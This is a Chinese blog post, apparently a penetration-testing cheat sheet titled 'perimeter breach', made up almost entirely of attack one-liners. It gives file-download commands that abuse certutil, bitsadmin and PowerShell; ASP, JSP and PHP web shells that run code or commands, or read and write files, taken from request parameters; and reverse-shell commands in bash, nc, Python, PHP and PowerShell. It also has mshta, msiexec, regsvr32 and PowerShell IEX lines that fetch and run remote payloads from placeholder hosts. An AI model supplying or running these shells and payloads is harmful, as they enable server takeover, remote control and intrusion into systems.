边界突破

Http

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000
Shell

Curl

curl http://example.com/File -o File
Shell

Wget

wget http://example.com/File -O File
Shell

Certutil

echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete
Shell

Bitsadmin

bitsadmin /transfer job http://example.com/File C:\Users\Public\File
Shell

PowerShell

powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))
PowerShell

WebShell

ASP

  • 代码执行
<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>
ASPNet
  • 命令执行
<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd")).stdout.readall %>
<%= Server.CreateObject("Shell.Application").ShellExecute("cmd.exe","/c "&request("cmd"),"","open",0) %>
ASPNet
  • 文件操作
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),1,False).Readall %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),2,True).WriteLine(request("data")) %>
ASPNet

JSP

  • 代码执行
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("code")); %>
<% new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("url"))}).loadClass(request.getParameter("class")).newInstance(); %>
Java
  • 命令执行
<% Runtime.getRuntime().exec(new String[]{"bash","-c",request.getParameter("cmd")}); %>
<% new ProcessBuilder(new String[]{"bash","-c",request.getParameter("cmd")}).start(); %>
Java
  • 文件操作
<% for(java.io.File name:new java.io.File(request.getParameter("dir")).listFiles()){out.println(name+"<br>");} %>
<%@ page import="java.io.FileInputStream" %><% FileInputStream File=new FileInputStream(application.getRealPath("/")+request.getParameter("file"));int Temp=0;while((Temp=File.read())!=-1){out.print((char)Temp);}File.close(); %>
<%@ page import="java.io.FileOutputStream" %><% FileOutputStream File=new FileOutputStream(application.getRealPath("/")+request.getParameter("file"));File.write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("data")));File.close(); %>
Java

PHP

  • 代码执行
<?php @eval($_REQUEST['code']); ?>
<?php @assert($_REQUEST['code']); ?>
<?php $main=@create_function('',$_REQUEST['code']);$main(); ?>
<?php @call_user_func($_REQUEST['func'],$_REQUEST['code']); ?>
<?php @array_map($_REQUEST['func'],array($_REQUEST['code'])); ?>
PHP
  • 命令执行
<?php @system($_REQUEST['cmd']); ?>
<?php @passthru($_REQUEST['cmd']); ?>
<?php echo @exec($_REQUEST['cmd']); ?>
<?php echo @shell_exec($_REQUEST['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array('-c',$_REQUEST['cmd'])); ?>
<?php $x=@popen($_REQUEST['cmd'], "r");echo stream_get_contents($x);pclose($x); ?>
<?php $x=@proc_open($_REQUEST['cmd'],array(1=>array("pipe","w")),$y);echo stream_get_contents($y[1]);proc_close($x); ?>
PHP
  • 文件操作
<?php echo @file_get_contents($_REQUEST['file']); ?>
<?php echo @implode('<br>',scandir($_REQUEST['dir'])); ?>
<?php @file_put_contents($_REQUEST['file'],base64_decode($_REQUEST['data'])); ?>
PHP

反弹Shell

TTY

python -c 'import pty; pty.spawn("/bin/bash")'
Shell

PHP

php -r '$sock=fsockopen("x.x.x.x",yyyy);exec("/bin/bash -i <&3 >&3 2>&3");'
Shell

Bash

bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1
Shell

Ncat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc x.x.x.x yyyy >/tmp/f
Shell

Mshta

mshta http://example.com/shell.hta
Shell

Python

python -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",yyyy));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'
Shell

Msiexec

msiexec /q /i http://example.com/shell.msi
Shell

Regsvr32

regsvr32 /s /n /u /i:http://example.com/shell.sct scrobj.dll
Shell

Rundll32

rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("shell");window.close();
Shell

PowerShell

powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://example.com/shell'))"
powershell -nop -c "$TCP=New-Object System.Net.Sockets.TCPClient('x.x.x.x',yyyy);$CMD=$TCP.GetStream();[byte[]]$Bytes = 0..65535|%{0};while(($I=$CMD.Read($Bytes,0,$Bytes.Length)) -ne 0){$Send=[Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$I) 2>&1 | Out-String)+'PS '+(pwd).Path+'> ');$CMD.Write($Send,0,$Send.Length);$CMD.Flush()};$TCP.Close()"
PowerShell
posted @   H4ck3rX  阅读(55)  评论(0编辑  收藏  举报
(评论功能已被禁用)
相关博文:
·  windows下载执行命令大全
·  如何快速隐藏CS
·  发现入口点
·  php命令执行
·  Vulnhub靶机笔记01——Billu_b0x
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
点击右上角即可分享
微信分享提示
AI IDE Trae